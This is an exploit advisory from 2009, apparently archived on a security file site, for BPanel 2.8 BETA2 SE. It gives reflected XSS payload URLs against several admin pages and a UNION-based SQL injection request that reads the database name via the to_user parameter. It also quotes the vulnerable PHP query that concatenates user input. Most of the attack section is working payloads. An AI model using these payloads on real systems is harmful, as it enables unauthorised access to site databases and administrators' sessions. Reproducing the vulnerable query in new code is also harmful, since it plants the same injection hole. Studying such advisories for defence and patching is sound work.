BPanel 2.8 BETA2 XSS / SQL Injection

BPanel 2.8 BETA2 XSS / SQL Injection: Posted Aug 26, 2009; Authored by Inj3ct0r | Site Inj3ct0r.com; BPanel versions 2.8 BETA2 SE and below suffer from remote SQL injection and cross site scripting vulnerabilities.; tags | exploit, remote, vulnerability, xss, sql injection; SHA-256 | ef063c2f6dce7f6e25fc22ae56b3559e533c161574ef1912fe9b524d0dc60eaa; Download | Favorite | View

BPanel 2.8 BETA2 XSS / SQL Injection

=========================================================
BPanel <= 2.8 BETA2 SE XSS + SQL Inj3ct0r Vulnerabilities
=========================================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By   : Inj3ct0r
#[+] Site            : Inj3ct0r.com
#[+] support e-mail  : submit[at]inj3ct0r.com


Product : BPanel
site: http://bpanel.ru/
version: BPanel 2.8 BETA2 SE

XSS Exploit:

/admin/index.php?mod=user&userwhere=ID&id=<script>alert()</ script>
/admin/index.php?mod=tarif&go=formupdate&id="><script>alert()</script>

(all)

/admin/template/help.php?rowservice[3]=<script>alert()</ script>
/admin/conf/database.php?tablebanners=<script>alert()</ script>


---------------------------------

ThE End =]  Visit my proj3ct  :

http://inj3ct0r.com
http://inj3ct0r.org
http://inj3ct0r.net


---------------------------------

SQL inj3ct0r Exploit:

GET: /admin/index.php?mod=sendmail&go=massmail&start=letter&to_user=-1'+union+select+1,2,3,4,DATABASE(),6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20--%20

Vulnerable code:

$resultuser = mysql_query ('' . 'select * from ' . $tableuser . ' where ID=\'' . $to_user . '\'');


ThE End =]  Visit my proj3ct  :

http://inj3ct0r.com
http://inj3ct0r.org
http://inj3ct0r.net


# ~  - [ [ : Inj3ct0r : ] ]

Top Authors In Last 30 Days

Red Hat 260 files
Ubuntu 90 files
indoushka 64 files
Jasper Nota 25 files
Gentoo 19 files
Willem Westerhof 19 files
Debian 15 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,090)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,547)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,646)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,459)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,729)
UNIX (9,433)
UnixWare (187)
Windows (6,670)
Other

BPanel 2.8 BETA2 XSS / SQL Injection

BPanel 2.8 BETA2 XSS / SQL Injection

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

BPanel 2.8 BETA2 XSS / SQL Injection

Share This

BPanel 2.8 BETA2 XSS / SQL Injection

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems